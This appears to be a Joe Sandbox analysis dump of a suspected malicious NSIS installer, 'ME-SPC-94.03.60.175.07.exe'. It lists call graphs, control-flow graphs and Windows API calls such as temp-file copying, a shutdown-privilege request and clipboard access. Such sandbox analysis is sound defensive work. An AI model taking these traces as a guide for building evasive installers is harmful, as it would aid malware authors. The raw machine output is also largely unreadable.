405a3e CharNextW CharNextW 4157->4206 4160 4057f0 4160->4119 4160->4120 4161 4061dc 5 API calls 4167 405ac2 4161->4167 4162 405af3 lstrlenW 4163 405afe 4162->4163 4162->4167 4164 405993 3 API calls 4163->4164 4166 405b03 GetFileAttributesW 4164->4166 4165 40628b 2 API calls 4165->4167 4166->4160 4167->4160 4167->4162 4167->4165 4168 4059df 2 API calls 4167->4168 4168->4162 4169->4124 4171 4059ed 4170->4171 4172 4059f3 CharPrevW 4171->4172 4173 4059ff 4171->4173 4172->4171 4172->4173 4173->4127 4174->4140 4212 405b8f GetFileAttributesW 4175->4212 4178 4057b5 4178->4153 4179 4057a3 RemoveDirectoryW 4181 4057b1 4179->4181 4180 4057ab DeleteFileW 4180->4181 4181->4178 4182 4057c1 SetFileAttributesW 4181->4182 4182->4178 4184 40520d 4183->4184 4185 4052af 4183->4185 4186 405229 lstrlenW 4184->4186 4187 405f6a 18 API calls 4184->4187 4185->4153 4188 405252 4186->4188 4189 405237 lstrlenW 4186->4189 4187->4186 4190 405265 4188->4190 4191 405258 SetWindowTextW 4188->4191 4189->4185 4192 405249 lstrcatW 4189->4192 4190->4185 4193 40526b SendMessageW SendMessageW SendMessageW 4190->4193 4191->4190 4192->4188 4193->4185 4215 4062b2 GetModuleHandleA 4194->4215 4198 405e0a 4198->4153 4200 4062a1 FindClose 4199->4200 4201 405954 4199->4201 4200->4201 4201->4121 4201->4133 4203 40595e 4202->4203 4204 4059af lstrcatW 4202->4204 4203->4137 4204->4203 4205->4157 4207 405a5b 4206->4207 4210 405a6d 4206->4210 4209 405a68 CharNextW 4207->4209 4207->4210 4208 405a91 4208->4160 4208->4161 4209->4208 4210->4208 4211 4059c0 CharNextW 4210->4211 4211->4210 4213 405ba1 SetFileAttributesW 4212->4213 4214 405794 4212->4214 4213->4214 4214->4178 4214->4179 4214->4180 4216 4062d9 GetProcAddress 4215->4216 4217 4062ce LoadLibraryA 4215->4217 4218 405de9 4216->4218 4217->4216 4217->4218 4218->4198 4219 405c66 lstrcpyW 4218->4219 4220 405cb5 GetShortPathNameW 4219->4220 4221 405c8f 4219->4221 4223 405cca 4220->4223 4224 405ddc 4220->4224 4244 405bb4 GetFileAttributesW CreateFileW 4221->4244 4223->4224 4226 405cd2 wsprintfA 4223->4226 4224->4198 4225 405c99 CloseHandle GetShortPathNameW 4225->4224 4227 405cad 4225->4227 4228 405f6a 18 API calls 4226->4228 4227->4220 4227->4224 4229 405cfa 4228->4229 4245 405bb4 GetFileAttributesW CreateFileW 4229->4245 4231 405d07 4231->4224 4232 405d16 GetFileSize GlobalAlloc 4231->4232 4233 405dd5 CloseHandle 4232->4233 4234 405d38 4232->4234 4233->4224 4246 405c37 ReadFile 4234->4246 4239 405d57 lstrcpyA 4242 405d79 4239->4242 4240 405d6b 4241 405b19 4 API calls 4240->4241 4241->4242 4243 405db0 SetFilePointer WriteFile GlobalFree 4242->4243 4243->4233 4244->4225 4245->4231 4247 405c55 4246->4247 4247->4233 4248 405b19 lstrlenA 4247->4248 4249 405b5a lstrlenA 4248->4249 4250 405b62 4249->4250 4251 405b33 lstrcmpiA 4249->4251 4250->4239 4250->4240 4251->4250 4252 405b51 CharNextA 4251->4252 4252->4249 5487 402224 5488 40223e 5487->5488 5489 40222b 5487->5489 5490 405f6a 18 API calls 5489->5490 5491 402238 5490->5491 5492 405724 MessageBoxIndirectW 5491->5492 5492->5488 5500 402729 5501 402730 5500->5501 5502 4029c7 5500->5502 5503 402736 FindClose 5501->5503 5503->5502 5504 401cab 5505 402b1d 18 API calls 5504->5505 5506 401cb2 5505->5506 5507 402b1d 18 API calls 5506->5507 5508 401cba GetDlgItem 5507->5508 5509 4024e8 5508->5509 5510 4042ae lstrcpynW lstrlenW 5511 4016af 5512 402b3a 18 API calls 5511->5512 5513 4016b5 GetFullPathNameW 5512->5513 5514 4016f1 5513->5514 5515 4016cf 5513->5515 5516 401706 GetShortPathNameW 5514->5516 5517 4029c7 5514->5517 5515->5514 5518 40628b 2 API calls 5515->5518 5516->5517 5519 4016e1 5518->5519 5519->5514 5521 405f48 lstrcpynW 5519->5521 5521->5514 4289 405331 4290 405352 GetDlgItem GetDlgItem GetDlgItem 4289->4290 4291 4054dd 4289->4291 4335 4041cf SendMessageW 4290->4335 4293 4054e6 GetDlgItem CreateThread CloseHandle 4291->4293 4294 40550e 4291->4294 4293->4294 4338 4052c5 OleInitialize 4293->4338 4296 405539 4294->4296 4297 405525 ShowWindow ShowWindow 4294->4297 4298 40555e 4294->4298 4295 4053c3 4302 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4295->4302 4299 405545 4296->4299 4300 405599 4296->4300 4337 4041cf SendMessageW 4297->4337 4301 404201 8 API calls 4298->4301 4304 405573 ShowWindow 4299->4304 4305 40554d 4299->4305 4300->4298 4311 4055a7 SendMessageW 4300->4311 4306 40556c 4301->4306 4309 405439 4302->4309 4310 40541d SendMessageW SendMessageW 4302->4310 4307 405593 4304->4307 4308 405585 4304->4308 4312 404173 SendMessageW 4305->4312 4314 404173 SendMessageW 4307->4314 4313 4051f2 25 API calls 4308->4313 4315 40544c 4309->4315 4316 40543e SendMessageW 4309->4316 4310->4309 4311->4306 4317 4055c0 CreatePopupMenu 4311->4317 4312->4298 4313->4307 4314->4300 4319 40419a 19 API calls 4315->4319 4316->4315 4318 405f6a 18 API calls 4317->4318 4320 4055d0 AppendMenuW 4318->4320 4321 40545c 4319->4321 4322 405600 TrackPopupMenu 4320->4322 4323 4055ed GetWindowRect 4320->4323 4324 405465 ShowWindow 4321->4324 4325 405499 GetDlgItem SendMessageW 4321->4325 4322->4306 4326 40561b 4322->4326 4323->4322 4327 405488 4324->4327 4328 40547b ShowWindow 4324->4328 4325->4306 4329 4054c0 SendMessageW SendMessageW 4325->4329 4330 405637 SendMessageW 4326->4330 4336 4041cf SendMessageW 4327->4336 4328->4327 4329->4306 4330->4330 4331 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4330->4331 4333 405679 SendMessageW 4331->4333 4333->4333 4334 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4333->4334 4334->4306 4335->4295 4336->4325 4337->4296 4339 4041e6 SendMessageW 4338->4339 4340 4052e8 4339->4340 4343 40530f 4340->4343 4344 401389 2 API calls 4340->4344 4341 4041e6 SendMessageW 4342 405321 OleUninitialize 4341->4342 4343->4341 4344->4340 5522 402331 5523 402337 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 402349 5524->5525 5526 402b3a 18 API calls 5525->5526 5527 402353 RegCreateKeyExW 5526->5527 5528 40237d 5527->5528 5530 402793 5527->5530 5529 402398 5528->5529 5531 402b3a 18 API calls 5528->5531 5533 402b1d 18 API calls 5529->5533 5534 4023a4 5529->5534 5532 40238e lstrlenW 5531->5532 5532->5529 5533->5534 5535 4023bf RegSetValueExW 5534->5535 5536 403062 46 API calls 5534->5536 5537 4023d5 RegCloseKey 5535->5537 5536->5535 5537->5530 5539 404635 5540 404661 5539->5540 5541 404672 5539->5541 5600 405708 GetDlgItemTextW 5540->5600 5542 40467e GetDlgItem 5541->5542 5549 4046dd 5541->5549 5545 404692 5542->5545 5544 40466c 5547 4061dc 5 API calls 5544->5547 5548 4046a6 SetWindowTextW 5545->5548 5552 405a3e 4 API calls 5545->5552 5546 4047c1 5598 404955 5546->5598 5602 405708 GetDlgItemTextW 5546->5602 5547->5541 5553 40419a 19 API calls 5548->5553 5549->5546 5554 405f6a 18 API calls 5549->5554 5549->5598 5551 404201 8 API calls 5556 404969 5551->5556 5557 40469c 5552->5557 5558 4046c2 5553->5558 5559 404751 SHBrowseForFolderW 5554->5559 5555 4047f1 5560 405a9b 18 API calls 5555->5560 5557->5548 5564 405993 3 API calls 5557->5564 5561 40419a 19 API calls 5558->5561 5559->5546 5562 404769 CoTaskMemFree 5559->5562 5563 4047f7 5560->5563 5565 4046d0 5561->5565 5566 405993 3 API calls 5562->5566 5603 405f48 lstrcpynW 5563->5603 5564->5548 5601 4041cf SendMessageW 5565->5601 5568 404776 5566->5568 5571 4047ad SetDlgItemTextW 5568->5571 5575 405f6a 18 API calls 5568->5575 5570 4046d6 5573 4062b2 3 API calls 5570->5573 5571->5546 5572 40480e 5574 4062b2 3 API calls 5572->5574 5573->5549 5582 404816 5574->5582 5576 404795 lstrcmpiW 5575->5576 5576->5571 5578 4047a6 lstrcatW 5576->5578 5577 404855 5604 405f48 lstrcpynW 5577->5604 5578->5571 5580 40485c 5581 405a3e 4 API calls 5580->5581 5583 404862 GetDiskFreeSpaceW 5581->5583 5582->5577 5586 4059df 2 API calls 5582->5586 5587 4048a7 5582->5587 5585 404885 MulDiv 5583->5585 5583->5587 5585->5587 5586->5582 5588 4049d6 21 API calls 5587->5588 5597 404904 5587->5597 5589 4048f6 5588->5589 5592 404906 SetDlgItemTextW 5589->5592 5593 4048fb 5589->5593 5590 40140b 2 API calls 5591 404927 5590->5591 5605 4041bc KiUserCallbackDispatcher 5591->5605 5592->5597 5595 4049d6 21 API calls 5593->5595 5595->5597 5596 404943 5596->5598 5606 4045ca 5596->5606 5597->5590 5597->5591 5598->5551 5600->5544 5601->5570 5602->5555 5603->5572 5604->5580 5605->5596 5607 4045d8 5606->5607 5608 4045dd SendMessageW 5606->5608 5607->5608 5608->5598 5609 4027b5 5610 402b3a 18 API calls 5609->5610 5611 4027c3 5610->5611 5612 4027d9 5611->5612 5613 402b3a 18 API calls 5611->5613 5614 405b8f 2 API calls 5612->5614 5613->5612 5615 4027df 5614->5615 5635 405bb4 GetFileAttributesW CreateFileW 5615->5635 5617 4027ec 5618 402895 5617->5618 5619 4027f8 GlobalAlloc 5617->5619 5622 4028b0 5618->5622 5623 40289d DeleteFileW 5618->5623 5620 402811 5619->5620 5621 40288c CloseHandle 5619->5621 5636 40330f SetFilePointer 5620->5636 5621->5618 5623->5622 5625 402817 5626 4032f9 ReadFile 5625->5626 5627 402820 GlobalAlloc 5626->5627 5628 402830 5627->5628 5629 402864 WriteFile GlobalFree 5627->5629 5630 403062 46 API calls 5628->5630 5631 403062 46 API calls 5629->5631 5634 40283d 5630->5634 5632 402889 5631->5632 5632->5621 5633 40285b GlobalFree 5633->5629 5634->5633 5635->5617 5636->5625 5637 4028b6 5638 402b1d 18 API calls 5637->5638 5639 4028bc 5638->5639 5640 4028f8 5639->5640 5641 4028df 5639->5641 5645 402793 5639->5645 5643 402902 5640->5643 5644 40290e 5640->5644 5642 4028e4 5641->5642 5650 4028f5 5641->5650 5651 405f48 lstrcpynW 5642->5651 5646 402b1d 18 API calls 5643->5646 5647 405f6a 18 API calls 5644->5647 5646->5650 5647->5650 5650->5645 5652 405e8f wsprintfW 5650->5652 5651->5645 5652->5645 5653 404337 5654 40434f 5653->5654 5660 404469 5653->5660 5658 40419a 19 API calls 5654->5658 5655 4044d3 5656 4045a5 5655->5656 5657 4044dd GetDlgItem 5655->5657 5663 404201 8 API calls 5656->5663 5659 4044f7 5657->5659 5664 404566 5657->5664 5662 4043b6 5658->5662 5659->5664 5668 40451d 6 API calls 5659->5668 5660->5655 5660->5656 5661 4044a4 GetDlgItem SendMessageW 5660->5661 5684 4041bc KiUserCallbackDispatcher 5661->5684 5666 40419a 19 API calls 5662->5666 5667 4045a0 5663->5667 5664->5656 5669 404578 5664->5669 5671 4043c3 CheckDlgButton 5666->5671 5668->5664 5672 40458e 5669->5672 5673 40457e SendMessageW 5669->5673 5670 4044ce 5674 4045ca SendMessageW 5670->5674 5682 4041bc KiUserCallbackDispatcher 5671->5682 5672->5667 5676 404594 SendMessageW 5672->5676 5673->5672 5674->5655 5676->5667 5677 4043e1 GetDlgItem 5683 4041cf SendMessageW 5677->5683 5679 4043f7 SendMessageW 5680 404414 GetSysColor 5679->5680 5681 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5679->5681 5680->5681 5681->5667 5682->5677 5683->5679 5684->5670 5685 4014b8 5686 4014be 5685->5686 5687 401389 2 API calls 5686->5687 5688 4014c6 5687->5688 4702 4015b9 4703 402b3a 18 API calls 4702->4703 4704 4015c0 4703->4704 4705 405a3e 4 API calls 4704->4705 4713 4015c9 4705->4713 4706 401614 4708 401619 4706->4708 4709 401646 4706->4709 4707 4059c0 CharNextW 4710 4015d7 CreateDirectoryW 4707->4710 4711 401423 25 API calls 4708->4711 4715 401423 25 API calls 4709->4715 4710->4713 4714 4015ed GetLastError 4710->4714 4712 401620 4711->4712 4720 405f48 lstrcpynW 4712->4720 4713->4706 4713->4707 4714->4713 4717 4015fa GetFileAttributesW 4714->4717 4719 40163e 4715->4719 4717->4713 4718 40162d SetCurrentDirectoryW 4718->4719 4720->4718 5689 401939 5690 402b3a 18 API calls 5689->5690 5691 401940 lstrlenW 5690->5691 5692 4024e8 5691->5692 5693 40293b 5694 402b1d 18 API calls 5693->5694 5695 402941 5694->5695 5696 402974 5695->5696 5697 402793 5695->5697 5699 40294f 5695->5699 5696->5697 5698 405f6a 18 API calls 5696->5698 5698->5697 5699->5697 5701 405e8f wsprintfW 5699->5701 5701->5697 5702 40683c 5704 406421 5702->5704 5703 406d8c 5704->5703 5705 4064a2 GlobalFree 5704->5705 5706 4064ab GlobalAlloc 5704->5706 5707 406522 GlobalAlloc 5704->5707 5708 406519 GlobalFree 5704->5708 5705->5706 5706->5703 5706->5704 5707->5703 5707->5704 5708->5707 4936 40173f 4937 402b3a 18 API calls 4936->4937 4938 401746 4937->4938 4939 405be3 2 API calls 4938->4939 4940 40174d 4939->4940 4941 405be3 2 API calls 4940->4941 4941->4940 5709 10002a7f 5710 10002a97 5709->5710 5711 1000158f 2 API calls 5710->5711 5712 10002ab2 5711->5712

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 4059c0 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f48 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 49 403657-40365e call 40391f 46->49 50 4035c8-4035d3 call 4059c0 46->50 59 403663 49->59 63 403621-40362b 50->63 64 4035d5-40360a 50->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 69 403823-403827 ExitProcess 61->69 70 40381f 61->70 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 67 403692-4036ac lstrcatW lstrcmpiW 63->67 68 40362d-40363b call 405a9b 63->68 65 40360c-403610 64->65 73 403612-403617 65->73 74 403619-40361d 65->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f48 * 2 68->83 70->69 73->74 78 40361f 73->78 74->65 74->78 80 4036d1-4036fa call 405f48 76->80 81 4036c6-4036cc call 405f48 76->81 78->63 91 4036ff-40371b call 405f6a DeleteFileW 80->91 81->80 83->49 101 40375c-403764 91->101 102 40371d-40372d CopyFileW 91->102 104 403801-40380c ExitWindowsEx 92->104 105 4037f5-4037ff 92->105 93->92 96 4037a1-4037a3 93->96 96->92 103 4037a5-4037b7 GetCurrentProcess 96->103 101->91 107 403766-40376d call 405de2 101->107 102->101 106 40372f-40374f call 405de2 call 405f6a call 4056c3 102->106 103->92 115 4037b9-4037db 103->115 104->61 109 40380e-403810 call 40140b 104->109 105->104 105->109 106->101 122 403751-403758 CloseHandle 106->122 107->45 109->61 115->92 122->101
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403379
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                  • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000), ref: 004033DB
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000020), ref: 00403403
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403558
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403574
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403585
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040358D
                                                  • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                  • OleUninitialize.OLE32(?), ref: 0040366C
                                                  • ExitProcess.KERNEL32 ref: 0040368C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000,?), ref: 00403698
                                                  • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",00000000,?), ref: 004036A4
                                                  • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004036B0
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 004036B7
                                                  • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,0041FEA8,?), ref: 00403725
                                                  • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                  • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                  • ExitProcess.KERNEL32 ref: 00403827
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231$C:\Users\user\Desktop$C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-1195976803
                                                  • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                  • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                  • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                  • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 141 405573-405583 ShowWindow 135->141 142 40554d-405559 call 404173 135->142 136->134 139 40559f-4055a5 136->139 139->134 148 4055a7-4055ba SendMessageW 139->148 144 405593-405594 call 404173 141->144 145 405585-40558e call 4051f2 141->145 142->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 164 40561b-405632 160->164 161->160 165 405488 162->165 166 40547b-405486 ShowWindow 162->166 163->155 167 4054c0-4054d8 SendMessageW * 2 163->167 168 405637-405652 SendMessageW 164->168 169 40548e-405494 call 4041cf 165->169 166->169 167->155 168->168 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                  • GetClientRect.USER32(?,?), ref: 004053DC
                                                  • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405480
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                    • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                  • ShowWindow.USER32(00000000), ref: 0040552C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405531
                                                  • ShowWindow.USER32(00000008), ref: 0040557B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                  • CreatePopupMenu.USER32 ref: 004055C0
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                  • GetWindowRect.USER32(?,?), ref: 004055F4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                  • OpenClipboard.USER32(00000000), ref: 00405655
                                                  • EmptyClipboard.USER32 ref: 0040565B
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                  • CloseClipboard.USER32 ref: 004056B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {$&B
                                                  • API String ID: 590372296-2518801558
                                                  • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                  • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                  • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                  • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
